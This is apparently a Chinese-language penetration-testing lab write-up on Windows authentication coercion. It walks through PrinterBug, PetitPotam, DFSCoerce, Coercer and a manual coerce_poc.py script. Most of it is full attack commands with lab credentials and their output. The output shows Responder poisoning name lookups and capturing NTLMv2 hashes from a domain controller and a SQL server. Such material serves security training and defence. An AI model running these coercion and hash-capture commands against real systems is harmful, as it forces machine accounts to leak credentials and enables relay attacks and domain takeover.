Authentication Coercion
Authentication Coercion与Farming Hashes(shares webdev mssql)中讲的投毒or欺骗攻击不同,这种攻击可以强制客户端向我们发起身份验证,即使其不想发起身份验证
Authentication coercion技术更以目标为中心,而非机会主义攻击。身份验证强制攻击通常依赖于某些敏感服务器协议中存在的不安全代码。
正如 @podalirius_ 所提到的:“这些方法中‘漏洞/特性’的根本原因在于,Windows 机器在尝试访问类似 \\172.16.117.30\file.txt 的 UNC 路径时,会自动向其他机器进行身份验证。”
下面的序列图展示了如何将身份验证强制与中继攻击结合起来的概念:
1. 常见的利用工具与技巧
下面会介绍很多利用SMB、HTTP、NTLM身份验证的工具,尽管这些工具的数量很多,但基本所有的工具都是利用的一套流程
- 使用有效的域凭据(通常通过 SMB)对远程计算机进行身份验证。
- 连接到远程 SMB 管道,例如
\PIPE\netdfs、\PIPE\efsrpc、\PIPE\lsarpc或\PIPE\lsass - 绑定到
RPC协议,以便在任意目标机器上调用其方法
1.1. MS-RPRN PrinterBug
PrinterBug 技术利用了打印系统远程协议,这是一种由打印后台处理程序服务(Print Spooler Service)使用的协议,该服务默认在所有 Windows 机器上运行。
具体而言,PrinterBug 利用了 RpcRemoteFindFirstPrinterChangeNotificationEx 方法。该方法会创建一个远程更改通知对象,用于监视打印机对象的更改,并使用 RpcRouterReplyPrinter(参见 3.2.4.1.2 节)或 RpcRouterReplyPrinterEx(参见 3.2.4.1.4 节)向打印客户端发送更改通知。
这里有多种的利用工具,包括 printerbug.py (Python)、 MSRPRN-coerce (Python)和 SpoolSample (C#)、还有我们最爱用的nxc
1.1.1. 打印机漏洞-SMB中继
python3 printerbug.py inlanefreight/plaintext$:'o6@ekK5#rlw2rAe'@172.16.117.3 172.16.117.30
[*] Impacket v0.10.1.dev1+20230718.100545.fdbd2568 - Copyright 2022 Fortra
[*] Attempting to trigger authentication via rprn RPC at 172.16.117.3
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
这里使用printerbug.py
然后就捕获到了NTLMv2-SSP hash
python3 Responder.py -I ens192
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::INLANEFREIGHT:24044d80125dd669:F3DC56D71629EA180ED2C542D622AF79:010100000000000080<SNIP>
1.1.2. 打印机漏洞-HTTP中继
printerbug.py使用与上面相同的命令,但是认证目标记得使用ATTACKER_MACHINE_NAME@PORT/PATH 格式将其设置为有效的 WebDAV 连接字符串
printerbug.py inlanefreight/plaintext$:'o6@ekK5#rlw2rAe'@172.16.117.60 SUPPORTPC@80/print
[*] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Attempting to trigger authentication via rprn RPC at 172.16.117.60
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked
ATTACKER_MACHINE_NAME必须是攻击者机器的NetBIOS或DNS名称(Responder启动时默认提供一个,这里我们设置为SUPPORTP)PORT参数指定WebDAV服务用于连接攻击机的任意端口PATH指定WebDAV服务将尝试连接的任意路径
[*] [NBT-NS] Poisoned answer sent to 172.16.117.60 for name SUPPORTPC (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.16.117.60 for name supportpc.local
[*] [LLMNR] Poisoned answer sent to 172.16.117.60 for name supportpc
[HTTP] Sending NTLM authentication request to fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Client : fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Username : INLANEFREIGHT\SQL01$
[WebDAV] NTLMv2 Hash : SQL01$::INLANEFREIGHT:26f495d9cf2db5ee:4AA96074630A7A9F52DA1D66284DC2D9:0101000000000000993EE3BBDD<SNIP>
成功获取到HTTP的NTLMv2 Hash
1.2. MS-EFSR PetitPotam
PetitPotam 漏洞利用了加密文件系统远程协议 ( MS-EFSR / EFSRPC ) 的 EfsRpcOpenFileRaw 和 EfsRpcEncryptFileSrv 方法。此方法也需要有效域凭据。
但是在 CVE-2021-36942 修复之前,可以不用凭据也可以触发此PetiPotam和PrinterBug,且可以针对域内任何主机(包括DC)
假设我们没有有效的域凭据,且遇到了已修复 EfsRpcOpenFileRaw 和 EfsRpcEncryptFileSrv 的主机。在这种情况下,我们可以尝试使用 ly4k 的 PetitPotam,它实现了原始 PetitPotam 中未包含的其他方法。
1.2.1. 使用petitipotam进行SMB强制认证
可以使用下面的方式运行
python3 PetitPotam.py 172.16.117.30 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.117.3[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
-u\-p指定账户密码,如果我们要通过ntlmrelayx来代理,可以使用-no-pass
python3 Responder.py -I ens192
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::INLANEFREIGHT:24044d80125dd669:F3DC56D71629EA180ED2C542D622AF79:010100000000000080<SNIP>
1.2.2. 使用petitipotam进行Webdev强制认证
只需要修改一下监听对象的格式为 webdev即可
python3 PetitPotam.py WIN-MMRQDG2R0ZX@80/files 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe'
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
[*] [NBT-NS] Poisoned answer sent to 172.16.117.60 for name WIN-MMRQDG2R0ZX (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.16.117.60 for name win-mmrqdg2r0zx.local
[*] [LLMNR] Poisoned answer sent to 172.16.117.60 for name win-mmrqdg2r0zx
[WebDAV] NTLMv2 Client : fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Username : INLANEFREIGHT\SQL01$
[WebDAV] NTLMv2 Hash : SQL01$::INLANEFREIGHT:715dc37f7e25ef48:F5A3856A112F4159F0F2715AA1F31E22:0101000000000000E8C027D7D7<SNIP>
1.3. MS-DFSNMDFSCoerce
DFSCoerce 滥用分布式文件系统 (DFS) 命名空间管理协议 ( MS-DFSNM ) 的 NetrDfsAddStdRoot 和 NetrDfsRemoveStdRoot 方法;与之前的工具类似,我们需要有效的域凭据才能使用它( DFSCoerce 似乎无法强制进行 HTTP NTLM 身份验证):
python3 dfscoerce.py -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' 172.16.117.30 172.16.117.3
[-] Connecting to ncacn_np:172.16.117.3[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: '172.16.117.30\x00'
RootShare: 'test\x00'
ApiFlags: 1
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[SMB] NTLMv2-SSP Client : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::INLANEFREIGHT:e2d2339638fc5fd6:D4979A923DD76BC3CFA418E94958E2B0:010100000000000000E0550D97C<SNIP>
1.4. Coercer(RPC)
Coercer是一款功能强大的 authentication coercion 工具,可自动滥用 5 种 RPC 协议中的 17 种方法 (更多信息 在 Microsoft 协议中搜索 RPC 函数以强制身份验证)
1.4.1. 扫描模式
scan mode会测试目标机器上监听的 RPC 调用,以确定我们是否可以利用它们来强制身份验证。
Coercer scan -t 172.16.117.50 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4-blackhat-edition
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting scan mode
[info] Scanning target 172.16.117.50
[+] Listening for authentications on '172.16.117.30', SMB port 445
[!] SMB named pipe '\PIPE\Fssagentrpc' is not accessible!
[!] SMB named pipe '\PIPE\efsrpc' is not accessible!
[+] SMB named pipe '\PIPE\eventlog' is accessible!
[+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
[!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\172.16.117.30\sXd63wiK\aa')
1.4.2. 强制模式
coerce mode通过利用受害机上的 RPC 调用来强制触发身份验证,以便我们可以通过 ntlmrelayx 等工具将其转发到中继目标。
- 使用
--always-continue选项,可以避免 Coercer 在每次 RPC 调用时询问是否继续
Coercer coerce -t 172.16.117.50 -l 172.16.117.30 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v --always-continue
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4-blackhat-edition
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting coerce mode
[info] Scanning target 172.16.117.50
[+] Coercing '172.16.117.50' to authenticate to '172.16.117.30'
[!] SMB named pipe '\PIPE\Fssagentrpc' is not accessible!
[!] SMB named pipe '\PIPE\efsrpc' is not accessible!
[+] SMB named pipe '\PIPE\eventlog' is accessible!
[+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
[!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\172.16.117.30\eYZugFvq\aa')
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
[+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
[>] (-testing-) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\172.16.117.30\MCdr2yRV\file.txt\ [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\172.16.117.30\MCdr2yRV\file.txt\x00')
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\172.16.117.30\TTT3UX3c\\x00')
1.4.3. HTTP NTLM Authentication Coercion
Coercer 具有 --auth-type 选项,允许我们根据想要强制执行的 NTLM 身份验证类型指定 http 或 smb
python3 Coercer.py -t 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -wh SUPPORTPC2 -wp 80 -v
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v1.6
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[debug] Detected 5 usable pipes in implemented protocols.
[172.16.117.60] Analyzing available protocols on the remote machine and perform RPC calls to coerce authentication to None ...
<SNIP>
[>] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc] ... success
[>] Pipe '\PIPE\lsarpc' is accessible!
[>] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc] ... success
[>] Binding to <uuid='c681d488-d850-11d0-8c52-00c04fd90f7e', version='1.0'> ... success
[>] Connecting to ncacn_np:172.16.117.60[\PIPE\lsarpc] ... success
[>] Binding to <uuid='c681d488-d850-11d0-8c52-00c04fd90f7e', version='1.0'> ... success
[>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcOpenFileRaw' (opnum 0) ... rpc_s_access_denied
[>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcEncryptFileSrv' (opnum 4) ... ERROR_BAD_NETPATH (Attack has worked!)
[>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcDecryptFileSrv' (opnum 5) ... ERROR_BAD_NETPATH (Attack has worked!)
[>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcQueryUsersOnFile' (opnum 6) ... ERROR_BAD_NETPATH (Attack has worked!)
[>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcQueryRecoveryAgents' (opnum 7) ... ERROR_BAD_NETPATH (Attack has worked!)
[>] On '172.16.117.60' through '\PIPE\lsarpc' targeting 'MS-EFSR::EfsRpcEncryptFileSrv' (opnum 12) ... ERROR_BAD_NETPATH (Attack has worked!)
<SNIP>
[+] All done!
*] [LLMNR] Poisoned answer sent to 172.16.117.60 for name supportpc2
[*] [MDNS] Poisoned answer sent to 172.16.117.60 for name supportpc2.local
[HTTP] Sending NTLM authentication request to fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Client : fe80::1559:28a9:7c9:caca
[WebDAV] NTLMv2 Username : INLANEFREIGHT\SQL01$
[WebDAV] NTLMv2 Hash : SQL01$::INLANEFREIGHT:b3785e9c8db01fc7:3EBEBE5CE7E2B2C14D959CE368B3535D:0101000000000000C88<SNIP>
1.5. 手动利用
除了使用Coercer来自动滥用 RPC 调用,我们也可以利用 windows coerced authentication methodsGitHub 仓库手动完成相同的操作。
假设我们只想滥用 MS-DFSNM协议中的 NetrDfsAddStdRoot RPC 调用:在克隆仓库后,我们先导航到包含 MS-DFSNM 方法的文件夹,然后再进入特定 RPC 调用(即本例中的 NetrDfsAddStdRoot)的子文件夹。
每个 RPC 调用文件夹中都有一个名为 coerce_poc.py 的 Python 脚本。我们可以通过该脚本提供有效的凭据、域名、监听端以及目标端,然后运行它:
python3 coerce_poc.py -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local 172.16.117.30 172.16.117.3
Windows auth coerce using MS-DFSNM::NetrDfsAddStdRoot()
[>] Connecting to ncacn_np:172.16.117.3[\PIPE\netdfs] ... success
[>] Binding to <uuid='4fc742e0-4a10-11cf-8273-00aa004ae673', version='3.0'> ... success
[>] Calling NetrDfsAddStdRoot() ...
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
python3 Responder.py -I ens192
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::INLANEFREIGHT:24044d80125dd669:F3DC56D71629EA180ED2C542D622AF79:010100000000000080<SNIP>